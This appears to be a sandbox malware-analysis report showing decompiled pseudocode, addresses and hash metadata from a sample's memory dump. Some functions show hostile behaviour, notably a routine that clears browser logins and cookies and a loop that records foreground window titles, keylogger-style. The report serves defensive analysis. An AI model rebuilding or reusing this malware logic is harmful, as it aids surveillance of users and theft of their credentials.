                    											if(__eflags < 0) {
                    												goto L56;
                    											}
                    											if(__eflags > 0) {
                    												goto L55;
                    											}
                    											__eflags = _t151 - 0x64;
                    											if(_t151 < 0x64) {
                    												goto L56;
                    											}
                    											goto L55;
                    										}
                    										__eflags = _t151 - 0x3e8;
                    										if(_t151 < 0x3e8) {
                    											goto L52;
                    										}
                    										goto L51;
                    									}
                    									__eflags = _t151;
                    									if(_t151 < 0) {
                    										goto L47;
                    									}
                    									goto L46;
                    								}
                    							}
                    							goto L23;
                    						}
                    					}
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L11;
                    					} else {
                    						_t183 = E00449D16(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                    						__eflags = _t183;
                    						if(_t183 == 0) {
                    							_t128 = E00457250(_t184, 0x65);
                    							_pop(_t166);
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								__eflags = _a28;
                    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								__eflags = _t170;
                    								 *_t128 = _t170;
                    								 *((char*)(_t128 + 3)) = 0;
                    							}
                    							_t183 = 0;
                    						} else {
                    							 *_t184 = 0;
                    						}
                    						goto L62;
                    					}
                    				} else {
                    					_t129 = E0043FFBD();
                    					_t183 = 0x22;
                    					 *_t129 = _t183;
                    					E0043B6B0();
                    					L62:
                    					if(_v40 != 0) {
                    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                    					}
                    					return _t183;
                    				}
                    			}
























































                    0x00449a13
                    0x00449a1e
                    0x00449a25
                    0x00449a27
                    0x00449a27
                    0x00449a29
                    0x00449a32
                    0x00449a34
                    0x00449a39
                    0x00449a3f
                    0x00449a55
                    0x00449a5a
                    0x00449a5d
                    0x00449a6a
                    0x00449a6f
                    0x00449ac3
                    0x00449acb
                    0x00449acd
                    0x00449acf
                    0x00449ad2
                    0x00449ad2
                    0x00449ad2
                    0x00449ad8
                    0x00449ae0
                    0x00449af3
                    0x00449af6
                    0x00449af8
                    0x00449afb
                    0x00449afc
                    0x00449b1d
                    0x00449b20
                    0x00449b20
                    0x00449afe
                    0x00449afe
                    0x00449b00
                    0x00449b0b
                    0x00449b0b
                    0x00449b0d
                    0x00449b14
                    0x00449b0f
                    0x00449b0f
                    0x00449b0f
                    0x00449b0d
                    0x00449b21
                    0x00449b23
                    0x00449b24
                    0x00449b27
                    0x00449b29
                    0x00449b33
                    0x00449b3d
                    0x00449b2b
                    0x00449b2b
                    0x00449b2b
                    0x00449b42
                    0x00449b42
                    0x00449b47
                    0x00449b4a
                    0x00449b55
                    0x00449b55
                    0x00449b55
                    0x00449b55
                    0x00449b59
                    0x00449b60
                    0x00449b61
                    0x00449b64
                    0x00449b67
                    0x00449b67
                    0x00449b69
                    0x00000000
                    0x00000000
                    0x00449b81
                    0x00449b88
                    0x00449b8c
                    0x00449b8f
                    0x00449b92
                    0x00449b94
                    0x00449b94
                    0x00449b94
                    0x00449b96
                    0x00449b99
                    0x00449b9c
                    0x00449b9e
                    0x00449ba6
                    0x00449bac
                    0x00449baf
                    0x00449bb2
                    0x00449bb3
                    0x00449bb6
                    0x00449bb9
                    0x00449bb9
                    0x00449bbe
                    0x00449bc1
                    0x00000000
                    0x00000000
                    0x00449bd9
                    0x00449bde
                    0x00449be2
                    0x00000000
                    0x00000000
                    0x00449be6
                    0x00449be6
                    0x00449be9
                    0x00449bea
                    0x00449bea
                    0x00449bec
                    0x00449bef
                    0x00000000
                    0x00000000
                    0x00449bf1
                    0x00449bf4
                    0x00449bfb
                    0x00449bfe
                    0x00449c01
                    0x00449c17
                    0x00449c17
                    0x00449c17
                    0x00449c03
                    0x00449c03
                    0x00449c05
                    0x00449c08
                    0x00449c13
                    0x00449c0a
                    0x00449c0d
                    0x00449c0d
                    0x00449c08
                    0x00000000
                    0x00449c01
                    0x00449bf6
                    0x00449bf6
                    0x00449bf8
                    0x00449bf8
                    0x00449b4c
                    0x00449b4c
                    0x00449b4f
                    0x00449c1a
                    0x00449c1a
                    0x00449c1c
                    0x00449c1e
                    0x00449c21
                    0x00449c22
                    0x00449c23
                    0x00449c24
                    0x00449c2c
                    0x00449c2c
                    0x00449c2c
                    0x00449c2e
                    0x00449c31
                    0x00449c34
                    0x00449c36
                    0x00449c36
                    0x00449c38
                    0x00449c4a
                    0x00449c4e
                    0x00449c51
                    0x00449c58
                    0x00449c60
                    0x00449c60
                    0x00449c63
                    0x00449c65
                    0x00449c76
                    0x00449c76
                    0x00449c7a
                    0x00449c7a
                    0x00449c7d
                    0x00449c7f
                    0x00449c82
                    0x00000000
                    0x00449c67
                    0x00449c67
                    0x00449c6d
                    0x00449c6d
                    0x00449c71
                    0x00449c84
                    0x00449c84
                    0x00449c88
                    0x00449c89
                    0x00449c8b
                    0x00449c8d
                    0x00449cce
                    0x00449cce
                    0x00449cd0
                    0x00449cdd
                    0x00449cdd
                    0x00449cdf
                    0x00449ce1
                    0x00449ce2
                    0x00449ce3
                    0x00449cea
                    0x00449ced
                    0x00449cef
                    0x00449cef
                    0x00449cf0
                    0x00449cf2
                    0x00449cf5
                    0x00449cf5
                    0x00449cf7
                    0x00449cf9
                    0x00000000
                    0x00449cf9
                    0x00449cd2
                    0x00449cd4
                    0x00000000
                    0x00000000
                    0x00449cd6
                    0x00000000
                    0x00000000
                    0x00449cd8
                    0x00449cdb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00449cdb
                    0x00449c94
                    0x00449c9a
                    0x00449c9a
                    0x00449c9c
                    0x00449c9d
                    0x00449c9e
                    0x00449c9f
                    0x00449ca6
                    0x00449ca9
                    0x00449cab
                    0x00449cac
                    0x00449cae
                    0x00449cbb
                    0x00449cbb
                    0x00449cbd
                    0x00449cbf
                    0x00449cc0
                    0x00449cc1
                    0x00449cc8
                    0x00449ccb
                    0x00449ccd
                    0x00449ccd
                    0x00000000
                    0x00449ccd
                    0x00449cb0
                    0x00449cb0
                    0x00449cb2
                    0x00000000
                    0x00000000
                    0x00449cb4
                    0x00000000
                    0x00000000
                    0x00449cb6
                    0x00449cb9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00449cb9
                    0x00449c96
                    0x00449c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00449c98
                    0x00449c69
                    0x00449c6b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00449c6b
                    0x00449c65
                    0x00000000
                    0x00449b4f
                    0x00449b4a
                    0x00449a71
                    0x00449a73
                    0x00000000
                    0x00449a75
                    0x00449a8b
                    0x00449a90
                    0x00449a92
                    0x00449a9e
                    0x00449aa4
                    0x00449aa5
                    0x00449aa7
                    0x00449aa9
                    0x00449ab4
                    0x00449ab4
                    0x00449ab7
                    0x00449ab9
                    0x00449ab9
                    0x00449abc
                    0x00449a94
                    0x00449a94
                    0x00449a94
                    0x00000000
                    0x00449a92
                    0x00449a41
                    0x00449a41
                    0x00449a48
                    0x00449a49
                    0x00449a4b
                    0x00449cfd
                    0x00449d01
                    0x00449d06
                    0x00449d06
                    0x00449d15
                    0x00449d15

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 793c2febf87d0805342c0b240ef855f3db68f5616911a3d7986c5bfd3a47b7db
                    • Instruction ID: 209e87ecf8dea36731f509f314a6d86e7b298a17d8517ab620727e24dc8f5672
                    • Opcode Fuzzy Hash: 793c2febf87d0805342c0b240ef855f3db68f5616911a3d7986c5bfd3a47b7db
                    • Instruction Fuzzy Hash: A2A123729042869FEB21CE18C8827AFBBE5EF56310F14416FE9859B381C63C9D41D759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004421E1(void* _a4, intOrPtr* _a8) {
                    				char _v5;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _t44;
                    				char _t47;
                    				intOrPtr _t50;
                    				signed int _t52;
                    				signed int _t56;
                    				signed int _t57;
                    				void* _t59;
                    				signed int _t63;
                    				signed int _t65;
                    				char _t67;
                    				intOrPtr* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t75;
                    				void* _t76;
                    				void* _t77;
                    				signed int _t80;
                    				intOrPtr _t82;
                    				void* _t86;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t91;
                    				intOrPtr* _t98;
                    				void* _t101;
                    				intOrPtr _t102;
                    				intOrPtr _t103;
                    
                    				_t101 = _a4;
                    				if(_t101 != 0) {
                    					_t80 = 9;
                    					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                    					_t98 = _a8;
                    					__eflags = _t98;
                    					if(_t98 != 0) {
                    						_t82 =  *((intOrPtr*)(_t98 + 4));
                    						_t47 =  *_t98;
                    						_v16 = _t47;
                    						_v12 = _t82;
                    						__eflags = _t82 - 0xffffffff;
                    						if(__eflags > 0) {
                    							L7:
                    							_t89 = 7;
                    							__eflags = _t82 - _t89;
                    							if(__eflags < 0) {
                    								L12:
                    								_v5 = 0;
                    								_t50 = E0044232E(_t82, __eflags,  &_v16,  &_v5);
                    								_t75 = _v16;
                    								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                    								_t52 = E00456F50(_t75, _v12, 0x15180, 0);
                    								 *(_t101 + 0x1c) = _t52;
                    								_t86 = 0x45e2c0;
                    								_t76 = _t75 - _t52 * 0x15180;
                    								asm("sbb eax, edx");
                    								__eflags = _v5;
                    								if(_v5 == 0) {
                    									_t86 = 0x45e28c;
                    								}
                    								_t91 =  *(_t101 + 0x1c);
                    								_t56 = 1;
                    								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                    								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                    									L16:
                    									_t57 = _t56 - 1;
                    									 *(_t101 + 0x10) = _t57;
                    									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                    									_t59 = E00456F50( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                    									_t87 = 7;
                    									asm("cdq");
                    									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                    									_t63 = E00456F50(_t76, _v12, 0xe10, 0);
                    									 *(_t101 + 8) = _t63;
                    									_t77 = _t76 - _t63 * 0xe10;
                    									asm("sbb edi, edx");
                    									_t65 = E00456F50(_t77, _v12, 0x3c, 0);
                    									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                    									 *(_t101 + 4) = _t65;
                    									_t67 = 0;
                    									__eflags = 0;
                    									 *_t101 = _t77 - _t65 * 0x3c;
                    									L17:
                    									return _t67;
                    								} else {
                    									do {
                    										_t56 = _t56 + 1;
                    										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                    									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                    									goto L16;
                    								}
                    							}
                    							if(__eflags > 0) {
                    								L10:
                    								_t68 = E0043FFBD();
                    								_t102 = 0x16;
                    								 *_t68 = _t102;
                    								L11:
                    								_t67 = _t102;
                    								goto L17;
                    							}
                    							__eflags = _t47 - 0x934126cf;
                    							if(__eflags <= 0) {
                    								goto L12;
                    							}
                    							goto L10;
                    						}
                    						if(__eflags < 0) {
                    							goto L10;
                    						}
                    						__eflags = _t47 - 0xffff5740;
                    						if(_t47 < 0xffff5740) {
                    							goto L10;
                    						}
                    						goto L7;
                    					}
                    					_t69 = E0043FFBD();
                    					_t102 = 0x16;
                    					 *_t69 = _t102;
                    					E0043B6B0();
                    					goto L11;
                    				}
                    				_t71 = E0043FFBD();
                    				_t103 = 0x16;
                    				 *_t71 = _t103;
                    				E0043B6B0();
                    				return _t103;
                    			}
































                    0x004421ea
                    0x004421ef
                    0x0044220f
                    0x00442210
                    0x00442212
                    0x00442215
                    0x00442217
                    0x0044222a
                    0x0044222d
                    0x0044222f
                    0x00442232
                    0x00442235
                    0x00442238
                    0x00442243
                    0x00442245
                    0x00442246
                    0x00442248
                    0x00442264
                    0x00442268
                    0x00442271
                    0x00442276
                    0x0044227d
                    0x0044228a
                    0x0044228f
                    0x00442299
                    0x0044229e
                    0x004422a3
                    0x004422a5
                    0x004422ac
                    0x004422ae
                    0x004422ae
                    0x004422b3
                    0x004422b8
                    0x004422b9
                    0x004422bc
                    0x004422c4
                    0x004422c4
                    0x004422c5
                    0x004422d3
                    0x004422db
                    0x004422e8
                    0x004422e9
                    0x004422f3
                    0x004422f9
                    0x00442303
                    0x0044230a
                    0x0044230e
                    0x00442312
                    0x00442317
                    0x0044231b
                    0x00442323
                    0x00442323
                    0x00442325
                    0x00442328
                    0x00000000
                    0x004422be
                    0x004422be
                    0x004422be
                    0x004422bf
                    0x004422bf
                    0x00000000
                    0x004422be
                    0x004422bc
                    0x0044224a
                    0x00442253
                    0x00442253
                    0x0044225a
                    0x0044225b
                    0x0044225d
                    0x0044225d
                    0x00000000
                    0x0044225d
                    0x0044224c
                    0x00442251
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00442251
                    0x0044223a
                    0x00000000
                    0x00000000
                    0x0044223c
                    0x00442241
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00442241
                    0x00442219
                    0x00442220
                    0x00442221
                    0x00442223
                    0x00000000
                    0x00442223
                    0x004421f1
                    0x004421f8
                    0x004421f9
                    0x004421fb
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c507b2bf9ddeb938e9f5cfb799b1bc45766204e9bd79134876aa4419553702b4
                    • Instruction ID: 03f6efdf9cf912a2b8511d881cae7d496237e3131907beb42ef9d42d0faeaed0
                    • Opcode Fuzzy Hash: c507b2bf9ddeb938e9f5cfb799b1bc45766204e9bd79134876aa4419553702b4
                    • Instruction Fuzzy Hash: 92412572A00704AFE7249F39C901B5BBBA9EB88314F50856FF515DB281D3F9A9058798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040BE81(void* __edi) {
                    				char _v5;
                    				char _v6;
                    				char _v7;
                    				void* __ebx;
                    				void* __ecx;
                    				void* __ebp;
                    				intOrPtr _t18;
                    				void* _t36;
                    				intOrPtr _t40;
                    				char _t50;
                    				void* _t52;
                    				void* _t53;
                    				signed int _t54;
                    				signed int _t55;
                    				void* _t56;
                    
                    				_t52 = __edi;
                    				_t55 = _t54 & 0xfffffff8;
                    				 *0x471b1a = 1;
                    				Sleep( *0x471b28);
                    				_v7 = 0;
                    				_t36 = 0;
                    				_v6 = 0;
                    				_v5 = 0;
                    				goto L1;
                    				do {
                    					do {
                    						L1:
                    						_t60 = _t36;
                    						if(_t36 == 0) {
                    							L2:
                    							_t36 = E0040BD5E(_t60);
                    						}
                    						_t61 = _t36;
                    						if(_t36 == 0) {
                    							_t36 = E0040BBAC(_t50, _t52, _t61);
                    						}
                    						_t62 = _v6;
                    						if(_v6 == 0) {
                    							_v6 = E0040B9A5(_t36, _t50, _t52, _t62);
                    						}
                    						_t63 = _v7;
                    						if(_v7 == 0) {
                    							_v7 = E0040B916(_t50, _t52, _t63);
                    						}
                    						_t50 = _v5;
                    						_t64 = _t50;
                    						if(_t50 == 0) {
                    							_t50 = E0040B887(_t50, _t52, _t64);
                    							_v5 = _t50;
                    						}
                    						if(_t36 == 0 || _t36 == 0) {
                    							L16:
                    							Sleep(0x1388);
                    							_t18 = _v7;
                    							_t40 = _v6;
                    							_t50 = _v5;
                    						} else {
                    							_t18 = _v7;
                    							if(_t18 == 0 || _t50 == 0) {
                    								goto L16;
                    							} else {
                    								_t40 = _v6;
                    								if(_t40 == 0) {
                    									goto L16;
                    								}
                    							}
                    						}
                    						if(_t36 == 0) {
                    							goto L2;
                    						}
                    					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                    					_t74 = _t40;
                    				} while (_t40 == 0);
                    				_t56 = _t55 - 0x18;
                    				E00402093(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
                    				E0040C04D(_t36, _t50, _t53, _t74);
                    				E00402093(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
                    				_t57 = _t56 - 0x18;
                    				E00402093(_t36, _t56 - 0x18, _t50, _t53, "i");
                    				E0041AF84(_t36, _t52);
                    				E00402093(_t36, _t57 + 0x18, _t50, _t53, 0x465094);
                    				_push(0xaf);
                    				E00404AA1(0x474580, _t50, _t74);
                    				if( *0x471b19 != 0) {
                    					E00413425(0x4742d8, E00401FAB(0x4742d8), "FR", 1);
                    				}
                    				 *0x471b1a = 0;
                    				return 0;
                    			}


















                    0x0040be81
                    0x0040be84
                    0x0040be8f
                    0x0040be96
                    0x0040bea2
                    0x0040bea6
                    0x0040bea8
                    0x0040beae
                    0x0040beae
                    0x0040beb2
                    0x0040beb2
                    0x0040beb2
                    0x0040beb2
                    0x0040beb4
                    0x0040beb6
                    0x0040bebb
                    0x0040bebb
                    0x0040bebd
                    0x0040bebf
                    0x0040bec6
                    0x0040bec6
                    0x0040becc
                    0x0040bece
                    0x0040bed5
                    0x0040bed5
                    0x0040bedd
                    0x0040bedf
                    0x0040bee6
                    0x0040bee6
                    0x0040beea
                    0x0040beee
                    0x0040bef0
                    0x0040bef7
                    0x0040bef9
                    0x0040bef9
                    0x0040beff
                    0x0040bf19
                    0x0040bf1e
                    0x0040bf24
                    0x0040bf28
                    0x0040bf2c
                    0x0040bf05
                    0x0040bf05
                    0x0040bf0b
                    0x00000000
                    0x0040bf11
                    0x0040bf11
                    0x0040bf17
                    0x00000000
                    0x00000000
                    0x0040bf17
                    0x0040bf0b
                    0x0040bf32
                    0x00000000
                    0x00000000
                    0x0040bf34
                    0x0040bf4c
                    0x0040bf4c
                    0x0040bf54
                    0x0040bf5e
                    0x0040bf63
                    0x0040bf6f
                    0x0040bf74
                    0x0040bf7e
                    0x0040bf83
                    0x0040bf92
                    0x0040bf97
                    0x0040bfa1
                    0x0040bfad
                    0x0040bfc2
                    0x0040bfc8
                    0x0040bfc9
                    0x0040bfd6

                    APIs
                    Strings
                    • [Cleared browsers logins and cookies.], xrefs: 0040BF59
                    • Cleared browsers logins and cookies., xrefs: 0040BF6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                    • API String ID: 3472027048-1236744412
                    • Opcode ID: 2eb1410434a32873ea136118a0ad682ba9395054a041874cc6c0a5f2aa536b32
                    • Instruction ID: 0b99f3f42dbacdda3203eb1655251b8b00c1a0c52c0e73311ec22f6bf06de442
                    • Opcode Fuzzy Hash: 2eb1410434a32873ea136118a0ad682ba9395054a041874cc6c0a5f2aa536b32
                    • Instruction Fuzzy Hash: 7031B4152483806AC611677558267EB7F818E93708F0884BFB9C42B3D3DB7E484897DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040A39E() {
                    				char _v2004;
                    				char _v2008;
                    				char _v2028;
                    				void* _v2036;
                    				char _v2056;
                    				void* _v2060;
                    				char _v2080;
                    				void* _v2084;
                    				void* _t17;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				void* _t51;
                    				void* _t55;
                    				signed int _t56;
                    				void* _t58;
                    				void* _t59;
                    				void* _t60;
                    				void* _t61;
                    				void* _t62;
                    
                    				_t58 = (_t56 & 0xfffffff8) - 0x81c;
                    				_push(_t31);
                    				_t53 = _t32;
                    				_t55 = _t32 + 0x68;
                    				while(1) {
                    					E004368A0(_t51,  &_v2004, 0, 0x7d0);
                    					_t59 = _t58 + 0xc;
                    					while(1) {
                    						_t60 = _t59 - 0x18;
                    						E0040417E(_t31, _t60, _t49, _t55,  *((intOrPtr*)(_t53 + 0x50)));
                    						_t17 = E0041BFE6( &_v2008, _t49);
                    						_t59 = _t60 + 0x18;
                    						if(_t17 != 0) {
                    							break;
                    						}
                    						Sleep(0x1f4);
                    					}
                    					_t49 = E004042FC(_t31,  &_v2056, L"\r\n[ ", _t55, __eflags, E0040417E(_t31,  &_v2028, _t49, _t55,  &_v2004));
                    					E00401F13(_t53 + 4, _t20, _t53, E00403014(_t31,  &_v2080, _t20, _t51, _t55, __eflags, L" ]\r\n"));
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					_t61 = _t59 - 0x18;
                    					E00408F83(_t31, _t61, _t20, __eflags, _t55);
                    					E0040A0A0(_t53, _t49);
                    					while(1) {
                    						_t62 = _t61 - 0x18;
                    						E0040417E(_t31, _t62, _t49, _t55,  *((intOrPtr*)(_t53 + 0x50)));
                    						_t29 = E0041BFE6(0, _t49);
                    						_t58 = _t62 + 0x18;
                    						__eflags = _t29;
                    						if(_t29 == 0) {
                    							break;
                    						}
                    						Sleep(0x64);
                    					}
                    					E0040AF51(_t31, _t53, _t49);
                    				}
                    			}























                    0x0040a3a4
                    0x0040a3aa
                    0x0040a3ad
                    0x0040a3af
                    0x0040a3b2
                    0x0040a3be
                    0x0040a3c3
                    0x0040a3c6
                    0x0040a3c6
                    0x0040a3ce
                    0x0040a3d7
                    0x0040a3dc
                    0x0040a3e1
                    0x00000000
                    0x00000000
                    0x0040a3e8
                    0x0040a3e8
                    0x0040a413
                    0x0040a423
                    0x0040a42c
                    0x0040a435
                    0x0040a43e
                    0x0040a443
                    0x0040a449
                    0x0040a450
                    0x0040a455
                    0x0040a455
                    0x0040a45d
                    0x0040a464
                    0x0040a469
                    0x0040a46c
                    0x0040a46e
                    0x00000000
                    0x00000000
                    0x0040a472
                    0x0040a472
                    0x0040a47c
                    0x0040a47c

                    APIs
                      • Part of subcall function 0041BFE6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041BFF6
                      • Part of subcall function 0041BFE6: GetWindowTextLengthW.USER32(00000000), ref: 0041BFFF
                      • Part of subcall function 0041BFE6: GetWindowTextW.USER32 ref: 0041C029
                    • Sleep.KERNEL32(000001F4), ref: 0040A3E8
                    • Sleep.KERNEL32(00000064), ref: 0040A472
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: 8c059c561f06f9a4dff5b4fdd326771b7aa2e7ee10f206ad3cf6fdd8e41f67dc
                    • Instruction ID: f9abd80ded3b4a83d50d72fa7a1df38d4ee5529fafdf68cacdbc5609d6b5bac3
                    • Opcode Fuzzy Hash: 8c059c561f06f9a4dff5b4fdd326771b7aa2e7ee10f206ad3cf6fdd8e41f67dc
                    • Instruction Fuzzy Hash: C9119D716043045BC618BA76CC07AAE77A8AF50308F40053FF586665E3EF78AA1986DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 38%
                    			E0041B294(void* __edx) {
                    				char _v12;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				char _v44;
                    				void* _v52;
                    				void* _v60;
                    				char _v64;
                    				void* _v68;
                    				void* _v76;
                    				void* _t21;
                    				void* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t26;
                    				void* _t36;
                    
                    				_t36 = __edx;
                    				 *0x473b14( &_v12,  &_v36,  &_v44);
                    				Sleep(0x3e8);
                    				 *0x473b14( &_v32,  &_v40,  &_v64);
                    				_t21 = E0041B33E();
                    				_t22 = E0041B33E();
                    				asm("sbb ebx, edx");
                    				_t23 = E0041B33E();
                    				asm("sbb ebx, edx");
                    				_t24 = E0041B33E();
                    				asm("adc ebx, edx");
                    				_t25 = E0041B33E();
                    				asm("sbb esi, edx");
                    				_t26 = E0041B33E();
                    				asm("adc esi, edx");
                    				return E00456C10(E00456BD0(_t21 - _t22 - _t23 + _t24 - _t25 + _t26, _t36, 0x64, 0), _t36, _t21 - _t22 - _t23 + _t24, _t36);
                    			}




















                    0x0041b294
                    0x0041b2aa
                    0x0041b2b5
                    0x0041b2ca
                    0x0041b2d4
                    0x0041b2e1
                    0x0041b2ec
                    0x0041b2ee
                    0x0041b2f9
                    0x0041b2fb
                    0x0041b306
                    0x0041b308
                    0x0041b317
                    0x0041b319
                    0x0041b324
                    0x0041b33d

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: SystemTimes$Sleep__aulldiv
                    • String ID:
                    • API String ID: 188215759-0
                    • Opcode ID: bfe13e88a8f00c2f83e60e63a7d7e53e7d386c69de4ac45dfd475e0856f8a395
                    • Instruction ID: 9a5cb21856bcef2e7ad7a7eed92e92c0b4d2fcc32f14b27c825dfc5d189fd417
                    • Opcode Fuzzy Hash: bfe13e88a8f00c2f83e60e63a7d7e53e7d386c69de4ac45dfd475e0856f8a395
                    • Instruction Fuzzy Hash: 351130725043586BC304EBB5CD85DEF7BACEB84254F440A3EB95682051EE29EA4886B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00443413(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				short** _t16;
                    				char* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x4714e4; // 0x7d72d0
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E004454E5(_t13, _t11, 1);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E00446172(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0044F4CF();
                    									E00446172(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}











                    0x00443413
                    0x00443416
                    0x0044341e
                    0x00443427
                    0x0044347c
                    0x00443435
                    0x0044343b
                    0x0044343f
                    0x0044348d
                    0x0044348d
                    0x00443441
                    0x00443449
                    0x0044344c
                    0x0044344f
                    0x00443486
                    0x00443487
                    0x00000000
                    0x00443451
                    0x0044345b
                    0x00443467
                    0x00000000
                    0x00443469
                    0x00443469
                    0x0044346a
                    0x0044346b
                    0x00443471
                    0x00443476
                    0x00443479
                    0x00000000
                    0x00443479
                    0x00443467
                    0x0044344f
                    0x00443482
                    0x00443485
                    0x00000000
                    0x00443485
                    0x00443480
                    0x00000000
                    0x00443420
                    0x00443424
                    0x00443424
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
